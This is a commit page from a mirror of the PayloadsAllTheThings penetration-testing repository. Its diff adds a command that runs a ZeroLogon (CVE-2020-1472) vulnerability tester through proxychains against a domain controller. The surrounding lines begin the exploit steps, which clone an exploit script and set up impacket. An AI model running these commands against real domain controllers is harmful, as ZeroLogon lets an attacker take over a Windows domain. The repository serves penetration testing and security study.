mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-14 07:12:54 +00:00
Add python check for ZeroLogon
This commit is contained in:
parent
df7172dca1
commit
52d83bea5f
1 changed files with 5 additions and 2 deletions
|
@ -534,6 +534,9 @@ Exploit steps from the white paper
|
|||
|
||||
* `cve-2020-1472-exploit.py` - Python script from dirkjanm
|
||||
```powershell
|
||||
# Check (https://github.com/SecuraBV/CVE-2020-1472)
|
||||
proxychains python3 zerologon_tester.py DC01 172.16.1.5
|
||||
|
||||
$ git clone https://github.com/dirkjanm/CVE-2020-1472.git
|
||||
|
||||
# Activate a virtual env to install impacket
|
||||
|
|
Loading…
Reference in a new issue